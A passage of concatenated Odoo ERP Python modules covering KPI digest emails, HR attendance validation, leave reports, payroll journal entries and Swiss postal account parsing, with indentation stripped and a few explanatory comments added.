kpi_res_users_connected_value = fields.Integer(compute='_compute_kpi_res_users_connected_value')
kpi_mail_message_total = fields.Boolean('Messages')
kpi_mail_message_total_value = fields.Integer(compute='_compute_kpi_mail_message_total_value')
def _compute_is_subscribed(self):
for digest in self:
digest.is_subscribed = self.env.user in digest.user_ids
def _compute_available_fields(self):
for digest in self:
kpis_values_fields = []
for field_name, field in digest._fields.items():
if field.type == 'boolean' and field_name.startswith(('kpi_', 'x_kpi_', 'x_studio_kpi_')) and digest[field_name]:
kpis_values_fields += [field_name + '_value']
digest.available_fields = ', '.join(kpis_values_fields)
def _get_kpi_compute_parameters(self):
return fields.Date.to_string(self._context.get('start_date')), fields.Date.to_string(self._context.get('end_date')), self._context.get('company')
def _compute_kpi_res_users_connected_value(self):
for record in self:
start, end, company = record._get_kpi_compute_parameters()
user_connected = self.env['res.users'].search_count([('company_id', '=', company.id), ('login_date', '>=', start), ('login_date', '<', end)])
record.kpi_res_users_connected_value = user_connected
def _compute_kpi_mail_message_total_value(self):
for record in self:
start, end, company = record._get_kpi_compute_parameters()
total_messages = self.env['mail.message'].search_count([('create_date', '>=',start), ('create_date', '<', end)])
record.kpi_mail_message_total_value = total_messages
@api.onchange('periodicity')
def _onchange_periodicity(self):
self.next_run_date = self._get_next_run_date()
@api.model
def create(self, vals):
vals['next_run_date'] = date.today() + relativedelta(days=3)
return super(Digest, self).create(vals)
@api.multi
def action_subscribe(self):
if self.env.user not in self.user_ids:
self.sudo().user_ids |= self.env.user
@api.multi
def action_unsubcribe(self):
if self.env.user in self.user_ids:
self.sudo().user_ids -= self.env.user
@api.multi
def action_activate(self):
self.state = 'activated'
@api.multi
def action_deactivate(self):
self.state = 'deactivated'
def action_send(self):
for digest in self:
for user in digest.user_ids:
subject = '%s: %s' % (user.company_id.name, digest.name)
digest.template_id.with_context(user=user).send_mail(digest.id, force_send=True, raise_exception=True, email_values={'email_to': user.email, 'subject': subject})
digest.next_run_date = digest._get_next_run_date()
def compute_kpis(self, company, user):
self.ensure_one()
res = {}
for tf_name, tf in self._compute_timeframes(company).items():
digest = self.with_context(start_date=tf[0][0], end_date=tf[0][1], company=company).sudo(user.id)
previous_digest = self.with_context(start_date=tf[1][0], end_date=tf[1][1], company=company).sudo(user.id)
kpis = {}
for field_name, field in self._fields.items():
if field.type == 'boolean' and field_name.startswith(('kpi_', 'x_kpi_', 'x_studio_kpi_')) and self[field_name]:
try:
compute_value = digest[field_name + '_value']
previous_value = previous_digest[field_name + '_value']
except AccessError: # no access rights -> just skip that digest details from that user's digest email
continue
margin = self._get_margin_value(compute_value, previous_value)
if self._fields[field_name+'_value'].type == 'monetary':
converted_amount = self._format_human_readable_amount(compute_value)
kpis.update({field_name: {field_name: self._format_currency_amount(converted_amount, company.currency_id), 'margin': margin}})
else:
kpis.update({field_name: {field_name: compute_value, 'margin': margin}})
res.update({tf_name: kpis})
return res
def compute_tips(self, company, user):
tip = self.env['digest.tip'].search([('user_ids', '!=', user.id), '|', ('group_id', 'in', user.groups_id.ids), ('group_id', '=', False)], limit=1)
if not tip:
return False
tip.user_ids += user
body = tools.html_sanitize(tip.tip_description)
tip_description = self.env['mail.template']._render_template(body, 'digest.tip', self.id)
return tip_description
def compute_kpis_actions(self, company, user):
""" Give an optional action to display in digest email linked to some KPIs.
:return dict: key: kpi name (field name), value: an action that will be
concatenated with /web#action={action}
"""
return {}
def _get_next_run_date(self):
self.ensure_one()
if self.periodicity == 'weekly':
delta = relativedelta(weeks=1)
elif self.periodicity == 'monthly':
delta = relativedelta(months=1)
elif self.periodicity == 'quarterly':
delta = relativedelta(months=3)
return date.today() + delta
def _compute_timeframes(self, company):
now = datetime.utcnow()
# TODO remove hasattr in >=saas-12.1
tz_name = hasattr(company, "resource_calendar_id") and company.resource_calendar_id.tz
if tz_name:
now = pytz.timezone(tz_name).localize(now)
start_date = now.date()
return {
'yesterday': (
(start_date + relativedelta(days=-1), start_date),
(start_date + relativedelta(days=-2), start_date + relativedelta(days=-1))),
'lastweek': (
(start_date + relativedelta(weeks=-1), start_date),
(start_date + relativedelta(weeks=-2), start_date + relativedelta(weeks=-1))),
'lastmonth': (
(start_date + relativedelta(months=-1), start_date),
(start_date + relativedelta(months=-2), start_date + relativedelta(months=-1))),
}
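    # Illustrative output (not in the original code): with start_date = 2019-03-15
    # the 'yesterday' entry is
    #   ((2019-03-14, 2019-03-15), (2019-03-13, 2019-03-14))
    # i.e. (current window, previous window), each as a (start, end) pair of dates.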
def _get_margin_value(self, value, previous_value=0.0):
margin = 0.0
if (value != previous_value) and (value != 0.0 and previous_value != 0.0):
margin = float_round((float(value-previous_value) / previous_value or 1) * 100, precision_digits=2)
return margin
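    # Worked example (illustrative, not in the original code): with value=120.0 and
    # previous_value=100.0 the margin is
    #   float_round((120.0 - 100.0) / 100.0 * 100, precision_digits=2) == 20.0
    # If either value is 0.0 or both values are equal, the margin stays at 0.0.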
def _format_currency_amount(self, amount, currency_id):
pre = post = u''
if currency_id.position == 'before':
pre = u'{symbol}\N{NO-BREAK SPACE}'.format(symbol=currency_id.symbol or '')
else:
post = u'\N{NO-BREAK SPACE}{symbol}'.format(symbol=currency_id.symbol or '')
return u'{pre}{0}{post}'.format(amount, pre=pre, post=post)
def _format_human_readable_amount(self, amount, suffix=''):
for unit in ['', 'K', 'M', 'G']:
if abs(amount) < 1000.0:
return "%3.1f%s%s" % (amount, unit, suffix)
amount /= 1000.0
return "%.1f%s%s" % (amount, 'T', suffix)
@api.model
def _cron_send_digest_email(self):
digests = self.search([('next_run_date', '=', fields.Date.today()), ('state', '=', 'activated')])
for digest in digests:
try:
digest.action_send()
except MailDeliveryException as e:
                _logger.warning('MailDeliveryException while sending digest %d. Digest is now scheduled for next cron update.', digest.id)
```
#### File: google_drive/models/res_config_settings.py
```python
from odoo import api, fields, models
class ResConfigSettings(models.TransientModel):
_inherit = "res.config.settings"
google_drive_authorization_code = fields.Char(string='Authorization Code', config_parameter='google_drive_authorization_code')
google_drive_uri = fields.Char(compute='_compute_drive_uri', string='URI', help="The URL to generate the authorization code from Google")
@api.depends('google_drive_authorization_code')
def _compute_drive_uri(self):
google_drive_uri = self.env['google.service']._get_google_token_uri('drive', scope=self.env['google.drive.config'].get_google_scope())
for config in self:
config.google_drive_uri = google_drive_uri
def set_values(self):
params = self.env['ir.config_parameter'].sudo()
authorization_code_before = params.get_param('google_drive_authorization_code')
super(ResConfigSettings, self).set_values()
authorization_code = self.google_drive_authorization_code
if authorization_code != authorization_code_before:
refresh_token = (
self.env['google.service'].generate_refresh_token('drive', authorization_code)
if authorization_code else False
)
params.set_param('google_drive_refresh_token', refresh_token)
```
#### File: hr_attendance/models/hr_attendance.py
```python
from odoo import models, fields, api, exceptions, _
class HrAttendance(models.Model):
_name = "hr.attendance"
_description = "Attendance"
_order = "check_in desc"
def _default_employee(self):
return self.env['hr.employee'].search([('user_id', '=', self.env.uid)], limit=1)
employee_id = fields.Many2one('hr.employee', string="Employee", default=_default_employee, required=True, ondelete='cascade', index=True)
department_id = fields.Many2one('hr.department', string="Department", related="employee_id.department_id",
readonly=True)
check_in = fields.Datetime(string="Check In", default=fields.Datetime.now, required=True)
check_out = fields.Datetime(string="Check Out")
worked_hours = fields.Float(string='Worked Hours', compute='_compute_worked_hours', store=True, readonly=True)
@api.multi
def name_get(self):
result = []
for attendance in self:
if not attendance.check_out:
result.append((attendance.id, _("%(empl_name)s from %(check_in)s") % {
'empl_name': attendance.employee_id.name,
'check_in': fields.Datetime.to_string(fields.Datetime.context_timestamp(attendance, fields.Datetime.from_string(attendance.check_in))),
}))
else:
result.append((attendance.id, _("%(empl_name)s from %(check_in)s to %(check_out)s") % {
'empl_name': attendance.employee_id.name,
'check_in': fields.Datetime.to_string(fields.Datetime.context_timestamp(attendance, fields.Datetime.from_string(attendance.check_in))),
'check_out': fields.Datetime.to_string(fields.Datetime.context_timestamp(attendance, fields.Datetime.from_string(attendance.check_out))),
}))
return result
@api.depends('check_in', 'check_out')
def _compute_worked_hours(self):
for attendance in self:
if attendance.check_out:
delta = attendance.check_out - attendance.check_in
attendance.worked_hours = delta.total_seconds() / 3600.0
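    # Illustrative example (not in the original code): a check_in at 08:00 and a
    # check_out at 12:30 on the same day give a delta of 16200 seconds, hence
    # worked_hours = 16200 / 3600.0 = 4.5. Open attendances (no check_out) are
    # skipped by this compute and keep their stored value.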
@api.constrains('check_in', 'check_out')
def _check_validity_check_in_check_out(self):
""" verifies if check_in is earlier than check_out. """
for attendance in self:
if attendance.check_in and attendance.check_out:
if attendance.check_out < attendance.check_in:
raise exceptions.ValidationError(_('"Check Out" time cannot be earlier than "Check In" time.'))
@api.constrains('check_in', 'check_out', 'employee_id')
def _check_validity(self):
""" Verifies the validity of the attendance record compared to the others from the same employee.
For the same employee we must have :
* maximum 1 "open" attendance record (without check_out)
* no overlapping time slices with previous employee records
"""
for attendance in self:
# we take the latest attendance before our check_in time and check it doesn't overlap with ours
last_attendance_before_check_in = self.env['hr.attendance'].search([
('employee_id', '=', attendance.employee_id.id),
('check_in', '<=', attendance.check_in),
('id', '!=', attendance.id),
], order='check_in desc', limit=1)
if last_attendance_before_check_in and last_attendance_before_check_in.check_out and last_attendance_before_check_in.check_out > attendance.check_in:
raise exceptions.ValidationError(_("Cannot create new attendance record for %(empl_name)s, the employee was already checked in on %(datetime)s") % {
'empl_name': attendance.employee_id.name,
'datetime': fields.Datetime.to_string(fields.Datetime.context_timestamp(self, fields.Datetime.from_string(attendance.check_in))),
})
if not attendance.check_out:
# if our attendance is "open" (no check_out), we verify there is no other "open" attendance
no_check_out_attendances = self.env['hr.attendance'].search([
('employee_id', '=', attendance.employee_id.id),
('check_out', '=', False),
('id', '!=', attendance.id),
], order='check_in desc', limit=1)
if no_check_out_attendances:
raise exceptions.ValidationError(_("Cannot create new attendance record for %(empl_name)s, the employee hasn't checked out since %(datetime)s") % {
'empl_name': attendance.employee_id.name,
'datetime': fields.Datetime.to_string(fields.Datetime.context_timestamp(self, fields.Datetime.from_string(no_check_out_attendances.check_in))),
})
else:
# we verify that the latest attendance with check_in time before our check_out time
# is the same as the one before our check_in time computed before, otherwise it overlaps
last_attendance_before_check_out = self.env['hr.attendance'].search([
('employee_id', '=', attendance.employee_id.id),
('check_in', '<', attendance.check_out),
('id', '!=', attendance.id),
], order='check_in desc', limit=1)
if last_attendance_before_check_out and last_attendance_before_check_in != last_attendance_before_check_out:
raise exceptions.ValidationError(_("Cannot create new attendance record for %(empl_name)s, the employee was already checked in on %(datetime)s") % {
'empl_name': attendance.employee_id.name,
'datetime': fields.Datetime.to_string(fields.Datetime.context_timestamp(self, fields.Datetime.from_string(last_attendance_before_check_out.check_in))),
})
@api.multi
@api.returns('self', lambda value: value.id)
def copy(self):
raise exceptions.UserError(_('You cannot duplicate an attendance.'))
```
#### File: hr_expense/models/res_config_settings.py
```python
from odoo import api, fields, models
class ResConfigSettings(models.TransientModel):
_inherit = 'res.config.settings'
expense_alias_prefix = fields.Char('Default Alias Name for Expenses')
use_mailgateway = fields.Boolean(string='Let your employees record expenses by email',
config_parameter='hr_expense.use_mailgateway')
@api.model
def get_values(self):
res = super(ResConfigSettings, self).get_values()
res.update(
expense_alias_prefix=self.env.ref('hr_expense.mail_alias_expense').alias_name,
)
return res
@api.multi
def set_values(self):
super(ResConfigSettings, self).set_values()
self.env.ref('hr_expense.mail_alias_expense').write({'alias_name': self.expense_alias_prefix})
@api.onchange('use_mailgateway')
def _onchange_use_mailgateway(self):
if not self.use_mailgateway:
self.expense_alias_prefix = False
```
#### File: hr_gamification/models/hr_employee.py
```python
from odoo import api, fields, models
class HrEmployee(models.Model):
_inherit = "hr.employee"
goal_ids = fields.One2many('gamification.goal', string='Employee HR Goals', compute='_compute_employee_goals')
badge_ids = fields.One2many(
'gamification.badge.user', string='Employee Badges', compute='_compute_employee_badges',
help="All employee badges, linked to the employee either directly or through the user"
)
has_badges = fields.Boolean(compute='_compute_employee_badges')
# necessary for correct dependencies of badge_ids and has_badges
direct_badge_ids = fields.One2many(
'gamification.badge.user', 'employee_id',
help="Badges directly linked to the employee")
@api.depends('user_id.goal_ids.challenge_id.category')
def _compute_employee_goals(self):
for employee in self:
employee.goal_ids = self.env['gamification.goal'].search([
('user_id', '=', employee.user_id.id),
('challenge_id.category', '=', 'hr'),
])
@api.depends('direct_badge_ids', 'user_id.badge_ids.employee_id')
def _compute_employee_badges(self):
for employee in self:
badge_ids = self.env['gamification.badge.user'].search([
'|', ('employee_id', '=', employee.id),
'&', ('employee_id', '=', False),
('user_id', '=', employee.user_id.id)
])
employee.has_badges = bool(badge_ids)
employee.badge_ids = badge_ids
class ResUsers(models.Model):
_inherit = 'res.users'
goal_ids = fields.One2many('gamification.goal', 'user_id')
badge_ids = fields.One2many('gamification.badge.user', 'user_id')
```
#### File: hr_holidays/report/hr_leave_report.py
```python
from odoo import api, fields, models, tools
class LeaveReport(models.Model):
_name = "hr.leave.report"
_description = 'Leave Summary / Report'
_auto = False
_order = "date_from DESC, employee_id"
employee_id = fields.Many2one('hr.employee', string="Employee", readonly=True)
name = fields.Char('Description', readonly=True)
number_of_days = fields.Float('Number of Days', readonly=True)
type = fields.Selection([
('allocation', 'Allocation Request'),
('request', 'Leave Request')
], string='Request Type', readonly=True)
department_id = fields.Many2one('hr.department', string='Department', readonly=True)
category_id = fields.Many2one('hr.employee.category', string='Employee Tag', readonly=True)
holiday_status_id = fields.Many2one("hr.leave.type", string="Leave Type", readonly=True)
state = fields.Selection([
('draft', 'To Submit'),
('cancel', 'Cancelled'),
('confirm', 'To Approve'),
('refuse', 'Refused'),
('validate1', 'Second Approval'),
('validate', 'Approved')
], string='Status', readonly=True)
holiday_type = fields.Selection([
('employee', 'By Employee'),
('category', 'By Employee Tag')
], string='Allocation Mode', readonly=True)
date_from = fields.Datetime('Start Date', readonly=True)
date_to = fields.Datetime('End Date', readonly=True)
payslip_status = fields.Boolean('Reported in last payslips', readonly=True)
def init(self):
tools.drop_view_if_exists(self._cr, 'hr_leave_report')
self._cr.execute("""
CREATE or REPLACE view hr_leave_report as (
SELECT row_number() over(ORDER BY leaves.employee_id) as id,
leaves.employee_id as employee_id, leaves.name as name,
leaves.number_of_days as number_of_days, leaves.type as type,
leaves.category_id as category_id, leaves.department_id as department_id,
leaves.holiday_status_id as holiday_status_id, leaves.state as state,
leaves.holiday_type as holiday_type, leaves.date_from as date_from,
leaves.date_to as date_to, leaves.payslip_status as payslip_status
from (select
allocation.employee_id as employee_id,
allocation.name as name,
allocation.number_of_days as number_of_days,
allocation.category_id as category_id,
allocation.department_id as department_id,
allocation.holiday_status_id as holiday_status_id,
allocation.state as state,
allocation.holiday_type,
null as date_from,
null as date_to,
FALSE as payslip_status,
'allocation' as type
from hr_leave_allocation as allocation
union all select
request.employee_id as employee_id,
request.name as name,
(request.number_of_days * -1) as number_of_days,
request.category_id as category_id,
request.department_id as department_id,
request.holiday_status_id as holiday_status_id,
request.state as state,
request.holiday_type,
request.date_from as date_from,
request.date_to as date_to,
request.payslip_status as payslip_status,
'request' as type
from hr_leave as request) leaves
);
""")
def _read_from_database(self, field_names, inherited_field_names=[]):
if 'name' in field_names and 'employee_id' not in field_names:
field_names.append('employee_id')
super(LeaveReport, self)._read_from_database(field_names, inherited_field_names)
if 'name' in field_names:
if self.user_has_groups('hr_holidays.group_hr_holidays_user'):
return
current_employee = self.env['hr.employee'].sudo().search([('user_id', '=', self.env.uid)], limit=1)
for record in self:
emp_id = record._cache.get('employee_id', [False])[0]
if emp_id != current_employee.id:
try:
record._cache['name']
record._cache['name'] = '*****'
except Exception:
# skip SpecialValue (e.g. for missing record or access right)
pass
```
#### File: hr_payroll_account/models/hr_payroll_account.py
```python
from odoo import api, fields, models, _
from odoo.exceptions import UserError
from odoo.tools import float_compare, float_is_zero
class HrPayslipLine(models.Model):
_inherit = 'hr.payslip.line'
def _get_partner_id(self, credit_account):
"""
Get partner_id of slip line to use in account_move_line
"""
# use partner of salary rule or fallback on employee's address
register_partner_id = self.salary_rule_id.register_id.partner_id
partner_id = register_partner_id.id or self.slip_id.employee_id.address_home_id.id
if credit_account:
if register_partner_id or self.salary_rule_id.account_credit.internal_type in ('receivable', 'payable'):
return partner_id
else:
if register_partner_id or self.salary_rule_id.account_debit.internal_type in ('receivable', 'payable'):
return partner_id
return False
class HrPayslip(models.Model):
_inherit = 'hr.payslip'
date = fields.Date('Date Account', states={'draft': [('readonly', False)]}, readonly=True,
help="Keep empty to use the period of the validation(Payslip) date.")
journal_id = fields.Many2one('account.journal', 'Salary Journal', readonly=True, required=True,
states={'draft': [('readonly', False)]}, default=lambda self: self.env['account.journal'].search([('type', '=', 'general')], limit=1))
move_id = fields.Many2one('account.move', 'Accounting Entry', readonly=True, copy=False)
@api.model
def create(self, vals):
if 'journal_id' in self.env.context:
vals['journal_id'] = self.env.context.get('journal_id')
return super(HrPayslip, self).create(vals)
@api.onchange('contract_id')
def onchange_contract(self):
super(HrPayslip, self).onchange_contract()
self.journal_id = self.contract_id.journal_id.id or (not self.contract_id and self.default_get(['journal_id'])['journal_id'])
@api.multi
def action_payslip_cancel(self):
moves = self.mapped('move_id')
moves.filtered(lambda x: x.state == 'posted').button_cancel()
moves.unlink()
return super(HrPayslip, self).action_payslip_cancel()
@api.multi
def action_payslip_done(self):
res = super(HrPayslip, self).action_payslip_done()
for slip in self:
line_ids = []
debit_sum = 0.0
credit_sum = 0.0
date = slip.date or slip.date_to
currency = slip.company_id.currency_id or slip.journal_id.company_id.currency_id
name = _('Payslip of %s') % (slip.employee_id.name)
move_dict = {
'narration': name,
'ref': slip.number,
'journal_id': slip.journal_id.id,
'date': date,
}
for line in slip.details_by_salary_rule_category:
amount = currency.round(slip.credit_note and -line.total or line.total)
if currency.is_zero(amount):
continue
debit_account_id = line.salary_rule_id.account_debit.id
credit_account_id = line.salary_rule_id.account_credit.id
if debit_account_id:
debit_line = (0, 0, {
'name': line.name,
'partner_id': line._get_partner_id(credit_account=False),
'account_id': debit_account_id,
'journal_id': slip.journal_id.id,
'date': date,
'debit': amount > 0.0 and amount or 0.0,
'credit': amount < 0.0 and -amount or 0.0,
'analytic_account_id': line.salary_rule_id.analytic_account_id.id or slip.contract_id.analytic_account_id.id,
'tax_line_id': line.salary_rule_id.account_tax_id.id,
})
line_ids.append(debit_line)
debit_sum += debit_line[2]['debit'] - debit_line[2]['credit']
if credit_account_id:
credit_line = (0, 0, {
'name': line.name,
'partner_id': line._get_partner_id(credit_account=True),
'account_id': credit_account_id,
'journal_id': slip.journal_id.id,
'date': date,
'debit': amount < 0.0 and -amount or 0.0,
'credit': amount > 0.0 and amount or 0.0,
'analytic_account_id': line.salary_rule_id.analytic_account_id.id or slip.contract_id.analytic_account_id.id,
'tax_line_id': line.salary_rule_id.account_tax_id.id,
})
line_ids.append(credit_line)
credit_sum += credit_line[2]['credit'] - credit_line[2]['debit']
if currency.compare_amounts(credit_sum, debit_sum) == -1:
acc_id = slip.journal_id.default_credit_account_id.id
if not acc_id:
raise UserError(_('The Expense Journal "%s" has not properly configured the Credit Account!') % (slip.journal_id.name))
adjust_credit = (0, 0, {
'name': _('Adjustment Entry'),
'partner_id': False,
'account_id': acc_id,
'journal_id': slip.journal_id.id,
'date': date,
'debit': 0.0,
'credit': currency.round(debit_sum - credit_sum),
})
line_ids.append(adjust_credit)
elif currency.compare_amounts(debit_sum, credit_sum) == -1:
acc_id = slip.journal_id.default_debit_account_id.id
if not acc_id:
raise UserError(_('The Expense Journal "%s" has not properly configured the Debit Account!') % (slip.journal_id.name))
adjust_debit = (0, 0, {
'name': _('Adjustment Entry'),
'partner_id': False,
'account_id': acc_id,
'journal_id': slip.journal_id.id,
'date': date,
'debit': currency.round(credit_sum - debit_sum),
'credit': 0.0,
})
line_ids.append(adjust_debit)
move_dict['line_ids'] = line_ids
move = self.env['account.move'].create(move_dict)
slip.write({'move_id': move.id, 'date': date})
move.post()
return res
class HrSalaryRule(models.Model):
_inherit = 'hr.salary.rule'
analytic_account_id = fields.Many2one('account.analytic.account', 'Analytic Account')
account_tax_id = fields.Many2one('account.tax', 'Tax')
account_debit = fields.Many2one('account.account', 'Debit Account', domain=[('deprecated', '=', False)])
account_credit = fields.Many2one('account.account', 'Credit Account', domain=[('deprecated', '=', False)])
class HrContract(models.Model):
_inherit = 'hr.contract'
_description = 'Employee Contract'
analytic_account_id = fields.Many2one('account.analytic.account', 'Analytic Account')
journal_id = fields.Many2one('account.journal', 'Salary Journal')
class HrPayslipRun(models.Model):
_inherit = 'hr.payslip.run'
journal_id = fields.Many2one('account.journal', 'Salary Journal', states={'draft': [('readonly', False)]}, readonly=True,
required=True, default=lambda self: self.env['account.journal'].search([('type', '=', 'general')], limit=1))
```
#### File: hr_payroll_account/tests/test_hr_payroll_account.py
```python
import time
from datetime import datetime, timedelta
from dateutil import relativedelta
from odoo import fields, tools
from odoo.modules.module import get_module_resource
from odoo.tests import common
class TestHrPayrollAccount(common.TransactionCase):
def _load(self, module, *args):
tools.convert_file(
self.cr, 'hr_payroll_account',
get_module_resource(module, *args), {}, 'init', False, 'test', self.registry._assertion_report)
def setUp(self):
super(TestHrPayrollAccount, self).setUp()
self._load('account', 'test', 'account_minimal_test.xml')
self.payslip_action_id = self.ref('hr_payroll.menu_department_tree')
self.res_partner_bank = self.env['res.partner.bank'].create({
'acc_number': '001-9876543-21',
'partner_id': self.ref('base.res_partner_12'),
'acc_type': 'bank',
'bank_id': self.ref('base.res_bank_1'),
})
self.hr_employee_john = self.env['hr.employee'].create({
'address_home_id': self.ref('base.res_partner_address_2'),
'address_id': self.ref('base.res_partner_address_27'),
'birthday': '1984-05-01',
'children': 0.0,
'country_id': self.ref('base.in'),
'department_id': self.ref('hr.dep_rd'),
'gender': 'male',
'marital': 'single',
'name': 'John',
'bank_account_id': self.res_partner_bank.bank_id.id,
})
self.hr_structure_softwaredeveloper = self.env['hr.payroll.structure'].create({
'name': 'Salary Structure for Software Developer',
'code': 'SD',
'company_id': self.ref('base.main_company'),
'parent_id': self.ref('hr_payroll.structure_base'),
'rule_ids': [(6, 0, [
self.ref('hr_payroll.hr_salary_rule_houserentallowance1'),
self.ref('hr_payroll.hr_salary_rule_convanceallowance1'),
self.ref('hr_payroll.hr_salary_rule_professionaltax1'),
self.ref('hr_payroll.hr_salary_rule_providentfund1'),
self.ref('hr_payroll.hr_salary_rule_meal_voucher'),
self.ref('hr_payroll.hr_salary_rule_sales_commission')
])],
})
# Create account journal.
self.hr_contract_john = self.env['hr.contract'].create({
'date_end': fields.Date.to_string(datetime.now() + timedelta(days=365)),
'date_start': fields.Date.today(),
'name': '<NAME> John',
'wage': 5000.0,
'type_id': self.ref('hr_contract.hr_contract_type_emp'),
'employee_id': self.hr_employee_john.id,
'struct_id': self.hr_structure_softwaredeveloper.id,
'journal_id': self.ref('hr_payroll_account.expenses_journal'),
})
self.hr_payslip = self.env['hr.payslip'].create({
'employee_id': self.hr_employee_john.id,
'journal_id': self.ref('hr_payroll_account.expenses_journal'),
})
def test_00_hr_payslip(self):
""" checking the process of payslip. """
date_from = time.strftime('%Y-%m-01')
date_to = str(datetime.now() + relativedelta.relativedelta(months=+1, day=1, days=-1))[:10]
res = self.hr_payslip.onchange_employee_id(date_from, date_to, self.hr_employee_john.id)
vals = {
'struct_id': res['value']['struct_id'],
'contract_id': res['value']['contract_id'],
'name': res['value']['name'],
}
vals['worked_days_line_ids'] = [(0, 0, i) for i in res['value']['worked_days_line_ids']]
vals['input_line_ids'] = [(0, 0, i) for i in res['value']['input_line_ids']]
vals.update({'contract_id': self.hr_contract_john.id})
self.hr_payslip.write(vals)
# I assign the amount to Input data.
payslip_input = self.env['hr.payslip.input'].search([('payslip_id', '=', self.hr_payslip.id)])
payslip_input.write({'amount': 5.0})
# I verify the payslip is in draft state.
self.assertEqual(self.hr_payslip.state, 'draft', 'State not changed!')
# I click on "Compute Sheet" button.
context = {"lang": "en_US", "tz": False, "active_model": 'hr.payslip', "department_id": False, "active_ids": [self.payslip_action_id], "section_id": False, "active_id": self.payslip_action_id}
self.hr_payslip.with_context(context).compute_sheet()
# I want to check cancel button. So I first cancel the sheet then make it set to draft.
self.hr_payslip.action_payslip_cancel()
self.assertEqual(self.hr_payslip.state, 'cancel', "Payslip is rejected.")
self.hr_payslip.action_payslip_draft()
# Confirm Payslip
self.hr_payslip.action_payslip_done()
# I verify that the Accounting Entries are created.
self.assertTrue(self.hr_payslip.move_id, 'Accounting Entries has not been created')
# I verify that the payslip is in done state.
self.assertEqual(self.hr_payslip.state, 'done', 'State not changed!')
```
#### File: hr_payroll_account/wizard/hr_payroll_payslips_by_employees.py
```python
from odoo import api, models
class HrPayslipEmployees(models.TransientModel):
_inherit = 'hr.payslip.employees'
@api.multi
def compute_sheet(self):
journal_id = False
if self.env.context.get('active_id'):
journal_id = self.env['hr.payslip.run'].browse(self.env.context.get('active_id')).journal_id.id
return super(HrPayslipEmployees, self.with_context(journal_id=journal_id)).compute_sheet()
```
#### File: hr_recruitment/models/hr_department.py
```python
from odoo import api, fields, models
class HrDepartment(models.Model):
_inherit = 'hr.department'
new_applicant_count = fields.Integer(
compute='_compute_new_applicant_count', string='New Applicant')
new_hired_employee = fields.Integer(
compute='_compute_recruitment_stats', string='New Hired Employee')
expected_employee = fields.Integer(
compute='_compute_recruitment_stats', string='Expected Employee')
@api.multi
def _compute_new_applicant_count(self):
applicant_data = self.env['hr.applicant'].read_group(
[('department_id', 'in', self.ids), ('stage_id.sequence', '<=', '1')],
['department_id'], ['department_id'])
result = dict((data['department_id'][0], data['department_id_count']) for data in applicant_data)
for department in self:
department.new_applicant_count = result.get(department.id, 0)
@api.multi
def _compute_recruitment_stats(self):
job_data = self.env['hr.job'].read_group(
[('department_id', 'in', self.ids)],
['no_of_hired_employee', 'no_of_recruitment', 'department_id'], ['department_id'])
new_emp = dict((data['department_id'][0], data['no_of_hired_employee']) for data in job_data)
expected_emp = dict((data['department_id'][0], data['no_of_recruitment']) for data in job_data)
for department in self:
department.new_hired_employee = new_emp.get(department.id, 0)
department.expected_employee = expected_emp.get(department.id, 0)
```
#### File: l10n_ch/models/res_bank.py
```python
import re
from odoo import api, fields, models, _
from odoo.tools.misc import mod10r
import werkzeug.urls
def _is_l10n_ch_postal(account_ref):
""" Returns True iff the string account_ref is a valid postal account number,
i.e. it only contains ciphers and is last cipher is the result of a recursive
modulo 10 operation ran over the rest of it. Shorten form with - is also accepted.
"""
if re.match('^[0-9]{2}-[0-9]{1,6}-[0-9]$', account_ref or ''):
ref_subparts = account_ref.split('-')
account_ref = ref_subparts[0] + ref_subparts[1].rjust(6,'0') + ref_subparts[2]
    if re.match(r'\d+$', account_ref or ''):
account_ref_without_check = account_ref[:-1]
return mod10r(account_ref_without_check) == account_ref
return False
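# Illustrative checks (values taken from the tests of this module, not new behaviour):
#   _is_l10n_ch_postal('010391391')   -> True   (last digit matches the mod10r check digit)
#   _is_l10n_ch_postal('01-039139-1') -> True   (shortened form is expanded to '010391391' first)
#   _is_l10n_ch_postal('010391394')   -> False  (wrong check digit)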
class ResBank(models.Model):
_inherit = 'res.bank'
l10n_ch_postal_chf = fields.Char(string='CHF ISR reference', help='The postal reference of the bank, used to generate ISR payment slips in CHF.')
l10n_ch_postal_eur = fields.Char(string='EUR ISR reference', help='The postal reference of the bank, used to generate ISR payment slips in EUR.')
class ResPartnerBank(models.Model):
_inherit = 'res.partner.bank'
l10n_ch_postal = fields.Char(string='ISR reference', help='The ISR number of the company within the bank')
@api.model
def _get_supported_account_types(self):
rslt = super(ResPartnerBank, self)._get_supported_account_types()
rslt.append(('postal', _('Postal')))
return rslt
@api.model
def retrieve_acc_type(self, acc_number):
""" Overridden method enabling the recognition of swiss postal bank
account numbers.
"""
if _is_l10n_ch_postal(acc_number):
return 'postal'
else:
return super(ResPartnerBank, self).retrieve_acc_type(acc_number)
@api.onchange('acc_number')
def _onchange_set_l10n_ch_postal(self):
if self.acc_type == 'iban':
self.l10n_ch_postal = self._retrieve_l10n_ch_postal(self.sanitized_acc_number)
else:
self.l10n_ch_postal = self.sanitized_acc_number
@api.model
def _retrieve_l10n_ch_postal(self, iban):
""" Reads a swiss postal account number from a an IBAN and returns it as
a string. Returns None if no valid postal account number was found, or
the given iban was not from Switzerland.
"""
if iban[:2] == 'CH':
#the IBAN corresponds to a swiss account
if _is_l10n_ch_postal(iban[-12:]):
return iban[-12:]
return None
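    # Illustrative examples (values taken from the tests of this module):
    #   _retrieve_l10n_ch_postal('CH6309000000250097798')       -> '000250097798'
    #   _retrieve_l10n_ch_postal('GR1601101250000000012300695') -> None (not a Swiss IBAN)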
def find_number(self, s):
        # this regex matches street numbers like 1bis or 1a
lmo = re.findall('([0-9]+[^ ]*)',s)
# no number found
if len(lmo) == 0:
return ''
# Only one number or starts with a number return the first one
if len(lmo) == 1 or re.match(r'^\s*([0-9]+[^ ]*)',s):
return lmo[0]
# else return the last one
if len(lmo) > 1:
return lmo[-1]
else:
return ''
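    # Illustrative behaviour (not part of the original code):
    #   find_number('12 Grand-Rue')    -> '12'   (string starts with a number)
    #   find_number('Grand-Rue 12a')   -> '12a'  (only one number found)
    #   find_number('Route 5, Bloc 7') -> '7'    (several numbers: keep the last one)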
@api.model
def build_swiss_code_url(self, amount, currency, date_due, debitor, ref_type, reference, comment):
communication = ""
if comment:
communication = (comment[:137] + '...') if len(comment) > 140 else comment
t_street_comp = '%s %s' % (self.company_id.street if (self.company_id.street != False) else '', self.company_id.street2 if (self.company_id.street2 != False) else '')
t_street_deb = '%s %s' % (debitor.street if (debitor.street != False) else '', debitor.street2 if (debitor.street2 != False) else '')
number = self.find_number(t_street_comp)
number_deb = self.find_number(t_street_deb)
